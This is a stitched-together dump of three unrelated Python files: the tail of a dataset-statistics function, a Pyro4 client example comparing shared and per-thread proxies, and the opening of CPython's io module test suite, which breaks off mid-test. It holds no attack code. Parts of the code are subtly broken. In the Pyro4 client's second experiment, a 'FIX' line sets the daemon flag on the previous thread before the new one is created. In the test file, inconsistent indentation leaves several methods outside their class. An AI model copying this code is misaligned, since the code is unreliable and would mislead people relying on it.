            stats[split] = None  # i.e. no test set
            continue
        x = []
        dataset = LoadImagesAndLabels(data[split])  # load dataset
        # Per-image class histogram: one bincount row per image.
        for label in tqdm(dataset.labels, total=dataset.n, desc="Statistics"):
            x.append(np.bincount(label[:, 0].astype(int), minlength=data["nc"]))
        x = np.array(x)  # shape(128x80)
        stats[split] = {
            "instance_stats": {"total": int(x.sum()), "per_class": x.sum(0).tolist()},
            "image_stats": {
                "total": dataset.n,
                "unlabelled": int(np.all(x == 0, 1).sum()),
                "per_class": (x > 0).sum(0).tolist(),
            },
            "labels": [
                {str(Path(k).name): round_labels(v.tolist())}
                for k, v in zip(dataset.im_files, dataset.labels)
            ],
        }
        if hub:
            # Produce reduced-quality web copies of this split's images.
            im_dir = hub_dir / "images"
            im_dir.mkdir(parents=True, exist_ok=True)
            for _ in tqdm(
                ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files),
                total=dataset.n,
                desc="HUB Ops",
            ):
                pass
    # Profile: time .npy vs .json round-trips of the stats dict.
    stats_path = hub_dir / "stats.json"
    if profile:
        for _ in range(1):
            file = stats_path.with_suffix(".npy")
            t1 = time.time()
            np.save(file, stats)
            t2 = time.time()
            x = np.load(file, allow_pickle=True)
            print(
                f"stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write"
            )
            file = stats_path.with_suffix(".json")
            t1 = time.time()
            with open(file, "w") as f:
                json.dump(stats, f)  # save stats *.json
            t2 = time.time()
            with open(file) as f:
                x = json.load(f)  # load hyps dict
            print(
                f"stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write"
            )
    # Save, print and return
    if hub:
        print(f"Saving {stats_path.resolve()}...")
        with open(stats_path, "w") as f:
            json.dump(stats, f)  # save stats.json
    if verbose:
        print(json.dumps(stats, indent=2, sort_keys=False))
    return stats
|
client.py | from __future__ import print_function
import sys
import time
import Pyro4
from Pyro4 import threadutil
# Pyro4's threadutil is the stdlib threading module; pick the
# current-thread accessor name that exists on this Python version.
if sys.version_info < (3, 0):
    current_thread = threadutil.currentThread
else:
    current_thread = threadutil.current_thread
# Shared flag the worker threads poll to know when to exit.
stop = False
def myThread(nsproxy, proxy):
    """Hammer the name server and the example server through the shared
    proxies until the global `stop` flag is set; print any exception."""
    global stop
    # FIX: Thread.getName() is a deprecated alias (since Python 3.10);
    # read the .name attribute instead.
    name = current_thread().name
    try:
        while not stop:
            result = nsproxy.list(prefix="example.")
            result = proxy.method("the quick brown fox jumps over the lazy dog")
    except Exception:
        x = sys.exc_info()[1]
        print("**** Exception in thread %s: {%s} %s" % (name, type(x), x))
# Locate the name server and a single server proxy that all threads share.
nsproxy = Pyro4.naming.locateNS()
proxy = Pyro4.core.Proxy("PYRONAME:example.proxysharing")
# now create a handful of threads and give each of them the same two proxy objects
threads = []
for i in range(5):
    thread = threadutil.Thread(target=myThread, args=(nsproxy, proxy))
    # FIX: Thread.setDaemon() is deprecated (since Python 3.10);
    # assign the .daemon attribute instead. Threads are joined below,
    # so they must not be daemons.
    thread.daemon = False
    threads.append(thread)
    thread.start()
print("Running a bunch of threads for 5 seconds.")
print("They're hammering the name server and the test server using the same proxy.")
print("You should not see any exceptions.")
time.sleep(5)
stop = True  # signal all workers to exit their loops
for thread in threads:
    thread.join()
print("Done.")
print("\nNow showing why proxy sharing might not be a good idea for parallelism.")
print("Starting 10 threads with the same proxy that all call the work() method.")
def myThread2(proxy):
    """Repeatedly invoke the remote work() method until the stop flag is set."""
    global stop
    while not stop:
        proxy.work()
# Experiment 1: ten threads all calling work() through ONE shared proxy.
stop = False
proxy.reset_work()
threads = []
for i in range(10):
    thread = threadutil.Thread(target=myThread2, args=[proxy])
    # FIX: setDaemon() is deprecated; assign the .daemon attribute.
    thread.daemon = False
    threads.append(thread)
    thread.start()
print("waiting 5 seconds")
start = time.time()
time.sleep(5)
print("waiting until threads have stopped...")
stop = True
for thread in threads:
    thread.join()
# FIX: keep the fractional seconds -- the int() truncation made the
# %.2f format below always print .00.
duration = time.time() - start
print("--> time until everything completed: %.2f" % duration)
print("--> work done on the server: %d" % proxy.get_work_done())
print("you can see that the 10 threads are waiting for each other to complete,")
print("and that not a lot of work has been done on the server.")
# Experiment 2: ten threads, each with its OWN proxy (true parallelism).
print("\nDoing the same again but every thread now has its own proxy.")
print("Starting 10 threads with different proxies that all call the work() method.")
proxy.reset_work()
stop = False
threads = []
for i in range(10):
    proxy = Pyro4.core.Proxy(proxy._pyroUri)  # create a new proxy
    # FIX: setDaemon() is deprecated; assign the .daemon attribute.
    thread.daemon = False
    thread = threadutil.Thread(target=myThread2, args=[proxy])
    threads.append(thread)
    thread.start()
print("waiting 5 seconds")
start = time.time()
time.sleep(5)
print("waiting until threads have stopped...")
stop = True
for thread in threads:
    thread.join()
# FIX: keep fractional seconds for the %.2f format (int() truncated them).
duration = time.time() - start
print("--> time until everything completed: %.2f" % duration)
print("--> work done on the server: %d" % proxy.get_work_done())
print("you can see that this time the 10 threads didn't have to wait for each other,")
print("and that they got a lot more work done because they really ran in parallel.")
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
    import ctypes
except ImportError:
    # No ctypes available: an array.array is also bytes-like while lacking
    # the str/sequence convenience methods we want to avoid.
    def byteslike(*pos, **kw):
        return array.array("b", bytes(*pos, **kw))
else:
    def byteslike(*pos, **kw):
        """Create a bytes-like object having no string or sequence methods"""
        payload = bytes(*pos, **kw)
        blob = EmptyStruct()
        ctypes.resize(blob, len(payload))
        memoryview(blob).cast("B")[:] = payload
        return blob
    class EmptyStruct(ctypes.Structure):
        pass
# Probe the interpreter's build configuration.
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
# True when CPython was built with MemorySanitizer instrumentation.
MEMORY_SANITIZER = (
    '-fsanitize=memory' in _cflags
    or '--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
# (Debug builds expose sys.gettotalrefcount; dev mode also enables it.)
IOBASE_EMITS_UNRAISABLE = sys.flags.dev_mode or hasattr(sys, "gettotalrefcount")
def _default_chunk_size():
    """Get the default TextIOWrapper chunk size"""
    # Any text-mode file works; this module's own source is always present.
    with open(__file__, "r", encoding="latin-1") as stream:
        return stream._CHUNK_SIZE
class MockRawIOWithoutRead:
    """A RawIO implementation without read(), so as to exercise the default
    RawIO.read() which calls readinto()."""

    def __init__(self, read_stack=()):
        self._read_stack = list(read_stack)
        self._write_stack = []
        self._reads = 0
        self._extraneous_reads = 0

    def write(self, b):
        self._write_stack.append(bytes(b))
        return len(b)

    def writable(self):
        return True

    def fileno(self):
        return 42

    def readable(self):
        return True

    def seekable(self):
        return True

    def seek(self, pos, whence):
        return 0  # wrong but we gotta return something

    def tell(self):
        return 0  # same comment as above

    def readinto(self, buf):
        self._reads += 1
        if not self._read_stack:
            # Reads past the scripted data are counted separately.
            self._extraneous_reads += 1
            return 0
        data = self._read_stack[0]
        if data is None:
            # None simulates "no data available right now".
            del self._read_stack[0]
            return None
        room = len(buf)
        size = len(data)
        if size <= room:
            del self._read_stack[0]
            buf[:size] = data
            return size
        # Partial read: hand out a prefix, keep the remainder queued.
        buf[:] = data[:room]
        self._read_stack[0] = data[room:]
        return room

    def truncate(self, pos=None):
        return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
    """MockRawIOWithoutRead bound to the C `io` implementation."""
    pass


class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
    """MockRawIOWithoutRead bound to the pure-Python `_pyio` implementation."""
    pass
class MockRawIO(MockRawIOWithoutRead):
    """Mock raw IO that additionally implements read() itself."""

    def read(self, n=None):
        self._reads += 1
        if self._read_stack:
            return self._read_stack.pop(0)
        # Scripted data exhausted: record the extra read, return EOF.
        self._extraneous_reads += 1
        return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
    """MockRawIO bound to the C `io` implementation."""
    pass


class PyMockRawIO(MockRawIO, pyio.RawIOBase):
    """MockRawIO bound to the pure-Python `_pyio` implementation."""
    pass
class MisbehavedRawIO(MockRawIO):
    """Raw IO whose return values deliberately violate the IO contracts
    (wrong byte counts, negative positions) to test caller robustness."""

    def write(self, b):
        # Claims to have written twice as many bytes as it did.
        return super().write(b) * 2

    def read(self, n=None):
        # Returns the data duplicated.
        return super().read(n) * 2

    def seek(self, pos, whence):
        return -123  # bogus negative position

    def tell(self):
        return -456  # bogus negative position

    def readinto(self, buf):
        super().readinto(buf)
        return len(buf) * 5  # claims far more bytes than the buffer holds
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
    """MisbehavedRawIO bound to the C `io` implementation."""
    pass


class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
    """MisbehavedRawIO bound to the pure-Python `_pyio` implementation."""
    pass
class SlowFlushRawIO(MockRawIO):
    """Raw IO whose flush() is slow; signals entry via an Event so tests
    can synchronize with it."""

    def __init__(self):
        super().__init__()
        self.in_flush = threading.Event()

    def flush(self):
        self.in_flush.set()  # let the test know flush has started
        time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
    """SlowFlushRawIO bound to the C `io` implementation."""
    pass


class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
    """SlowFlushRawIO bound to the pure-Python `_pyio` implementation."""
    pass
class CloseFailureIO(MockRawIO):
    """Raw IO whose first close() raises OSError; later closes are no-ops."""

    # Class-level default; flipped to 1 on the first (failing) close.
    closed = 0

    def close(self):
        if self.closed:
            return
        self.closed = 1
        raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
    """CloseFailureIO bound to the C `io` implementation."""
    pass


class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
    """CloseFailureIO bound to the pure-Python `_pyio` implementation."""
    pass
class MockFileIO:
    """BytesIO mixin that records the size of every read in read_history."""

    def __init__(self, data):
        self.read_history = []
        super().__init__(data)

    def read(self, n=None):
        chunk = super().read(n)
        self.read_history.append(None if chunk is None else len(chunk))
        return chunk

    def readinto(self, b):
        count = super().readinto(b)
        self.read_history.append(count)
        return count
class CMockFileIO(MockFileIO, io.BytesIO):
    """MockFileIO bound to the C `io` implementation."""
    pass


class PyMockFileIO(MockFileIO, pyio.BytesIO):
    """MockFileIO bound to the pure-Python `_pyio` implementation."""
    pass
class MockUnseekableIO:
    """Mixin that makes a stream report and behave as non-seekable.

    Subclasses supply the UnsupportedOperation attribute (from io or _pyio).
    """

    def seekable(self):
        return False

    def seek(self, *args):
        raise self.UnsupportedOperation("not seekable")

    def tell(self, *args):
        raise self.UnsupportedOperation("not seekable")

    def truncate(self, *args):
        raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
    """Unseekable BytesIO bound to the C `io` implementation."""
    UnsupportedOperation = io.UnsupportedOperation


class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
    """Unseekable BytesIO bound to the pure-Python `_pyio` implementation."""
    UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
    """Raw IO stub whose write() can simulate a non-blocking partial write.

    After block_on(char), a write whose data contains that character either
    writes only the prefix before it (returning the short count), or — when
    the character comes first — clears the blocker and returns None to
    signal "would block".
    """

    def __init__(self):
        self._write_stack = []
        self._blocker_char = None

    def pop_written(self):
        s = b"".join(self._write_stack)
        self._write_stack[:] = []
        return s

    def block_on(self, char):
        """Block when a given char is encountered."""
        self._blocker_char = char

    def readable(self):
        return True

    def seekable(self):
        return True

    def seek(self, pos, whence=0):
        # naive implementation, enough for tests
        return 0

    def writable(self):
        return True

    def write(self, b):
        b = bytes(b)
        n = -1
        if self._blocker_char:
            try:
                n = b.index(self._blocker_char)
            except ValueError:
                pass  # blocker not in this chunk: fall through to a full write
            else:
                if n > 0:
                    # write data up to the first blocker
                    self._write_stack.append(b[:n])
                    return n
                # cancel blocker and indicate would block
                self._blocker_char = None
                return None
        self._write_stack.append(b)
        return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
    """MockNonBlockWriterIO bound to the C `io` implementation."""
    BlockingIOError = io.BlockingIOError


class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
    """MockNonBlockWriterIO bound to the pure-Python `_pyio` implementation."""
    BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
    # Start each test without a leftover TESTFN file.
    support.unlink(support.TESTFN)
def tearDown(self):
    # Remove the TESTFN file a test may have created.
    support.unlink(support.TESTFN)
def write_ops(self, f):
    """Exercise write/seek/truncate behaviour on a writable stream *f*."""
    self.assertEqual(f.write(b"blah."), 5)
    f.truncate(0)
    self.assertEqual(f.tell(), 5)  # truncate() must not move the position
    f.seek(0)
    self.assertEqual(f.write(b"blah."), 5)
    self.assertEqual(f.seek(0), 0)
    self.assertEqual(f.write(b"Hello."), 6)
    self.assertEqual(f.tell(), 6)
    self.assertEqual(f.seek(-1, 1), 5)  # relative seek (SEEK_CUR)
    self.assertEqual(f.tell(), 5)
    buffer = bytearray(b" world\n\n\n")
    self.assertEqual(f.write(buffer), 9)
    buffer[:] = b"*" * 9  # Overwrite our copy of the data
    self.assertEqual(f.seek(0), 0)
    self.assertEqual(f.write(b"h"), 1)
    self.assertEqual(f.seek(-1, 2), 13)  # seek relative to end (SEEK_END)
    self.assertEqual(f.tell(), 13)
    self.assertEqual(f.truncate(12), 12)
    self.assertEqual(f.tell(), 13)  # position unchanged by truncate
    self.assertRaises(TypeError, f.seek, 0.0)  # float offsets are rejected
def read_ops(self, f, buffered=False):
    """Exercise read/readinto/seek on *f*, which must contain b'hello world' + newline."""
    data = f.read(5)
    self.assertEqual(data, b"hello")
    data = byteslike(data)
    self.assertEqual(f.readinto(data), 5)
    self.assertEqual(bytes(data), b" worl")
    data = bytearray(5)
    self.assertEqual(f.readinto(data), 2)  # only 2 bytes left in the file
    self.assertEqual(len(data), 5)
    self.assertEqual(data[:2], b"d\n")
    self.assertEqual(f.seek(0), 0)
    self.assertEqual(f.read(20), b"hello world\n")
    self.assertEqual(f.read(1), b"")  # at EOF
    self.assertEqual(f.readinto(byteslike(b"x")), 0)
    self.assertEqual(f.seek(-6, 2), 6)  # seek from end (SEEK_END)
    self.assertEqual(f.read(5), b"world")
    self.assertEqual(f.read(0), b"")
    self.assertEqual(f.readinto(byteslike()), 0)  # zero-length buffer
    self.assertEqual(f.seek(-6, 1), 5)  # seek from current (SEEK_CUR)
    self.assertEqual(f.read(5), b" worl")
    self.assertEqual(f.tell(), 10)
    self.assertRaises(TypeError, f.seek, 0.0)  # float offsets are rejected
    if buffered:
        f.seek(0)
        self.assertEqual(f.read(), b"hello world\n")
        f.seek(6)
        self.assertEqual(f.read(), b"world\n")
        self.assertEqual(f.read(), b"")
        f.seek(0)
        data = byteslike(5)
        self.assertEqual(f.readinto1(data), 5)  # buffered streams also have readinto1
        self.assertEqual(bytes(data), b"hello")
# 2 GiB boundary used by the large-file tests below.
LARGE = 2**31
def large_file_ops(self, f):
    """Seek/write/truncate around the 2 GiB boundary; skips when the
    platform lacks large-file support."""
    assert f.readable()
    assert f.writable()
    try:
        self.assertEqual(f.seek(self.LARGE), self.LARGE)
    except (OverflowError, ValueError):
        self.skipTest("no largefile support")
    self.assertEqual(f.tell(), self.LARGE)
    self.assertEqual(f.write(b"xxx"), 3)
    self.assertEqual(f.tell(), self.LARGE + 3)
    self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
    self.assertEqual(f.truncate(), self.LARGE + 2)  # truncate at current pos
    self.assertEqual(f.tell(), self.LARGE + 2)
    self.assertEqual(f.seek(0, 2), self.LARGE + 2)
    self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
    self.assertEqual(f.tell(), self.LARGE + 2)  # position unchanged by truncate
    self.assertEqual(f.seek(0, 2), self.LARGE + 1)
    self.assertEqual(f.seek(-1, 2), self.LARGE)
    self.assertEqual(f.read(2), b"x")  # only one byte remains after truncation
def test_invalid_operations(self):
    """Reading a write-only stream (and vice versa) raises UnsupportedOperation."""
    # Try writing on a file opened in read mode and vice-versa.
    exc = self.UnsupportedOperation
    for mode in ("w", "wb"):
        with self.open(support.TESTFN, mode) as fp:
            self.assertRaises(exc, fp.read)
            self.assertRaises(exc, fp.readline)
    with self.open(support.TESTFN, "wb", buffering=0) as fp:
        self.assertRaises(exc, fp.read)
        self.assertRaises(exc, fp.readline)
    with self.open(support.TESTFN, "rb", buffering=0) as fp:
        self.assertRaises(exc, fp.write, b"blah")
        self.assertRaises(exc, fp.writelines, [b"blah\n"])
    with self.open(support.TESTFN, "rb") as fp:
        self.assertRaises(exc, fp.write, b"blah")
        self.assertRaises(exc, fp.writelines, [b"blah\n"])
    with self.open(support.TESTFN, "r") as fp:
        self.assertRaises(exc, fp.write, "blah")
        self.assertRaises(exc, fp.writelines, ["blah\n"])
        # Non-zero seeking from current or end pos
        self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
        self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
    """Streams must accurately report (and enforce) which of fileno/read/
    write/seek they support."""
    # Test for OSError when optional APIs are not supported
    # The purpose of this test is to try fileno(), reading, writing and
    # seeking operations with various objects that indicate they do not
    # support these operations.

    def pipe_reader():
        [r, w] = os.pipe()
        os.close(w)  # So that read() is harmless
        return self.FileIO(r, "r")

    def pipe_writer():
        [r, w] = os.pipe()
        self.addCleanup(os.close, r)
        # Guarantee that we can write into the pipe without blocking
        thread = threading.Thread(target=os.read, args=(r, 100))
        thread.start()
        self.addCleanup(thread.join)
        return self.FileIO(w, "w")

    def buffered_reader():
        return self.BufferedReader(self.MockUnseekableIO())

    def buffered_writer():
        return self.BufferedWriter(self.MockUnseekableIO())

    def buffered_random():
        return self.BufferedRandom(self.BytesIO())

    def buffered_rw_pair():
        return self.BufferedRWPair(self.MockUnseekableIO(),
                                   self.MockUnseekableIO())

    def text_reader():
        class UnseekableReader(self.MockUnseekableIO):
            writable = self.BufferedIOBase.writable
            write = self.BufferedIOBase.write
        return self.TextIOWrapper(UnseekableReader(), "ascii")

    def text_writer():
        class UnseekableWriter(self.MockUnseekableIO):
            readable = self.BufferedIOBase.readable
            read = self.BufferedIOBase.read
        return self.TextIOWrapper(UnseekableWriter(), "ascii")

    # (factory, abilities) pairs; abilities: f=fileno, r=read, w=write, s=seek.
    tests = (
        (pipe_reader, "fr"), (pipe_writer, "fw"),
        (buffered_reader, "r"), (buffered_writer, "w"),
        (buffered_random, "rws"), (buffered_rw_pair, "rw"),
        (text_reader, "r"), (text_writer, "w"),
        (self.BytesIO, "rws"), (self.StringIO, "rws"),
    )
    for [test, abilities] in tests:
        with self.subTest(test), test() as obj:
            readable = "r" in abilities
            self.assertEqual(obj.readable(), readable)
            writable = "w" in abilities
            self.assertEqual(obj.writable(), writable)
            if isinstance(obj, self.TextIOBase):
                data = "3"
            elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
                data = b"3"
            else:
                self.fail("Unknown base class")
            if "f" in abilities:
                obj.fileno()
            else:
                self.assertRaises(OSError, obj.fileno)
            if readable:
                obj.read(1)
                obj.read()
            else:
                self.assertRaises(OSError, obj.read, 1)
                self.assertRaises(OSError, obj.read)
            if writable:
                obj.write(data)
            else:
                self.assertRaises(OSError, obj.write, data)
            if sys.platform.startswith("win") and test in (
                    pipe_reader, pipe_writer):
                # Pipes seem to appear as seekable on Windows
                continue
            seekable = "s" in abilities
            self.assertEqual(obj.seekable(), seekable)
            if seekable:
                obj.tell()
                obj.seek(0)
            else:
                self.assertRaises(OSError, obj.tell)
                self.assertRaises(OSError, obj.seek, 0)
            if writable and seekable:
                obj.truncate()
                obj.truncate(0)
            else:
                self.assertRaises(OSError, obj.truncate)
                self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
    """open() must reject file names containing NUL, for str and bytes paths."""
    fn_with_NUL = 'foo\0bar'
    self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
    bytes_fn = bytes(fn_with_NUL, 'ascii')
    with warnings.catch_warnings():
        # bytes paths may emit a DeprecationWarning; only the ValueError matters here.
        warnings.simplefilter("ignore", DeprecationWarning)
        self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
    """Unbuffered (buffering=0) file objects support the raw write/read ops."""
    with self.open(support.TESTFN, "wb", buffering=0) as f:
        self.assertEqual(f.readable(), False)
        self.assertEqual(f.writable(), True)
        self.assertEqual(f.seekable(), True)
        self.write_ops(f)
    with self.open(support.TESTFN, "rb", buffering=0) as f:
        self.assertEqual(f.readable(), True)
        self.assertEqual(f.writable(), False)
        self.assertEqual(f.seekable(), True)
        self.read_ops(f)
    def test_buffered_file_io(self):
        # Same as test_raw_file_io but through the default buffered layer;
        # read_ops is run with buffered=True to exercise buffered-only APIs.
        with self.open(support.TESTFN, "wb") as f:
            self.assertEqual(f.readable(), False)
            self.assertEqual(f.writable(), True)
            self.assertEqual(f.seekable(), True)
            self.write_ops(f)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readable(), True)
            self.assertEqual(f.writable(), False)
            self.assertEqual(f.seekable(), True)
            self.read_ops(f, True)
    def test_readline(self):
        # readline() honors the size limit (may stop mid-line), preserves
        # embedded NUL bytes, treats None as "no limit", and rejects
        # non-integer limits in both binary and text mode.
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readline(), b"abc\n")
            self.assertEqual(f.readline(10), b"def\n")
            self.assertEqual(f.readline(2), b"xy")
            self.assertEqual(f.readline(4), b"zzy\n")
            self.assertEqual(f.readline(), b"foo\x00bar\n")
            self.assertEqual(f.readline(None), b"another line")
            self.assertRaises(TypeError, f.readline, 5.3)
        with self.open(support.TESTFN, "r") as f:
            self.assertRaises(TypeError, f.readline, 5.3)
    def test_readline_nonsizeable(self):
        # Issue #30061
        # Crash when readline() returns an object without __len__
        class R(self.IOBase):
            def readline(self):
                return None
        # Iterating must fail cleanly instead of crashing on len(None).
        self.assertRaises((TypeError, StopIteration), next, R())
    def test_next_nonsizeable(self):
        # Issue #30061
        # Crash when __next__() returns an object without __len__
        class R(self.IOBase):
            def __next__(self):
                return None
        # readlines(hint) takes len() of each line; None must raise TypeError.
        self.assertRaises(TypeError, R().readlines, 1)
    def test_raw_bytes_io(self):
        # Run the shared write/read batteries against an in-memory BytesIO
        # round-trip instead of a real file.
        f = self.BytesIO()
        self.write_ops(f)
        data = f.getvalue()
        self.assertEqual(data, b"hello world\n")
        f = self.BytesIO(data)
        self.read_ops(f, True)
    def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; It takes
        # a long time to build the >2 GiB file and takes >2 GiB of disk space
        # therefore the resource must be enabled to run this test.
        if sys.platform[:3] == 'win' or sys.platform == 'darwin':
            support.requires(
                'largefile',
                'test requires %s bytes and a long time to run' % self.LARGE)
        # Exercise large-file operations both unbuffered (buffering=0)
        # and through the buffered layer.
        with self.open(support.TESTFN, "w+b", 0) as f:
            self.large_file_ops(f)
        with self.open(support.TESTFN, "w+b") as f:
            self.large_file_ops(f)
    def test_with_open(self):
        # The with-statement must close the file on normal exit AND when an
        # exception propagates out of the body, for both unbuffered (0) and
        # buffered (100) modes.
        for bufsize in (0, 100):
            f = None
            with self.open(support.TESTFN, "wb", bufsize) as f:
                f.write(b"xxx")
            self.assertEqual(f.closed, True)
            f = None
            try:
                with self.open(support.TESTFN, "wb", bufsize) as f:
                    1/0
            except ZeroDivisionError:
                self.assertEqual(f.closed, True)
            else:
                self.fail("1/0 didn't raise an exception")
    # issue 5008
    def test_append_mode_tell(self):
        # Opening in append mode must position the stream at end-of-file,
        # so tell() reflects the existing 3 bytes (binary) or at least a
        # positive offset (text, where tell() is an opaque cookie).
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "ab", buffering=0) as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "ab") as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "a") as f:
            self.assertGreater(f.tell(), 0)
    def test_destructor(self):
        # Destroying a FileIO subclass must call __del__, then close(),
        # then flush() — recorded as [1, 2, 3] — and the pending write
        # must reach disk.
        record = []
        class MyFileIO(self.FileIO):
            def __del__(self):
                record.append(1)
                try:
                    f = super().__del__
                except AttributeError:
                    # The base class may not define __del__ at all.
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super().close()
            def flush(self):
                record.append(3)
                super().flush()
        with support.check_warnings(('', ResourceWarning)):
            f = MyFileIO(support.TESTFN, "wb")
            f.write(b"xxx")
            del f
            support.gc_collect()
            self.assertEqual(record, [1, 2, 3])
            with self.open(support.TESTFN, "rb") as f:
                self.assertEqual(f.read(), b"xxx")
    def _check_base_destructor(self, base):
        # Helper: verify that destroying an instance of `base` calls
        # __del__, close() and flush() in that order, and that instance
        # attributes set in __init__ are still readable during teardown.
        record = []
        class MyIO(base):
            def __init__(self):
                # This exercises the availability of attributes on object
                # destruction.
                # (in the C version, close() is called by the tp_dealloc
                # function, not by __del__)
                self.on_del = 1
                self.on_close = 2
                self.on_flush = 3
            def __del__(self):
                record.append(self.on_del)
                try:
                    f = super().__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(self.on_close)
                super().close()
            def flush(self):
                record.append(self.on_flush)
                super().flush()
        f = MyIO()
        del f
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])
    def test_IOBase_destructor(self):
        # Destructor ordering for the IOBase ABC (see _check_base_destructor).
        self._check_base_destructor(self.IOBase)
    def test_RawIOBase_destructor(self):
        # Destructor ordering for RawIOBase (see _check_base_destructor).
        self._check_base_destructor(self.RawIOBase)
    def test_BufferedIOBase_destructor(self):
        # Destructor ordering for BufferedIOBase (see _check_base_destructor).
        self._check_base_destructor(self.BufferedIOBase)
    def test_TextIOBase_destructor(self):
        # Destructor ordering for TextIOBase (see _check_base_destructor).
        self._check_base_destructor(self.TextIOBase)
    def test_close_flushes(self):
        # Closing (via `with`) must flush buffered data to disk; a fresh
        # reader must see the written bytes.
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"xxx")
    def test_array_writes(self):
        # write() and writelines() must accept arbitrary buffer objects
        # (here an array.array), reporting the byte length written, across
        # all the writable stream implementations.
        a = array.array('i', range(10))
        n = len(a.tobytes())
        def check(f):
            with f:
                self.assertEqual(f.write(a), n)
                f.writelines((a,))
        check(self.BytesIO())
        check(self.FileIO(support.TESTFN, "w"))
        check(self.BufferedWriter(self.MockRawIO()))
        check(self.BufferedRandom(self.MockRawIO()))
        check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
    def test_read_closed(self):
        # A second file object wrapping the same fd (closefd=False) can
        # read independently, but once closed it must refuse further reads.
        with self.open(support.TESTFN, "w") as f:
            f.write("egg\n")
        with self.open(support.TESTFN, "r") as f:
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.read(), "egg\n")
            file.seek(0)
            file.close()
            self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
    def test_closefd_attr(self):
        # The closefd flag must be exposed on the raw layer: True for a
        # name-opened file, False when wrapping an fd with closefd=False.
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"egg\n")
        with self.open(support.TESTFN, "r") as f:
            self.assertEqual(f.buffer.raw.closefd, True)
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.buffer.raw.closefd, False)
    def test_garbage_collection(self):
        # FileIO objects are collected, and collecting them flushes
        # all data to disk.
        with support.check_warnings(('', ResourceWarning)):
            f = self.FileIO(support.TESTFN, "wb")
            f.write(b"abcxxx")
            # Create a reference cycle so the object only dies via the GC.
            f.f = f
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"abcxxx")
    def test_unbounded_file(self):
        # Issue #1174606: reading from an unbounded stream such as /dev/zero.
        # On a 32-bit address space, read() with no limit must raise
        # OverflowError at every layer (raw, buffered, text) rather than
        # trying to allocate an unbounded buffer.
        zero = "/dev/zero"
        if not os.path.exists(zero):
            self.skipTest("{0} does not exist".format(zero))
        if sys.maxsize > 0x7FFFFFFF:
            self.skipTest("test can only run in a 32-bit address space")
        if support.real_max_memuse < support._2G:
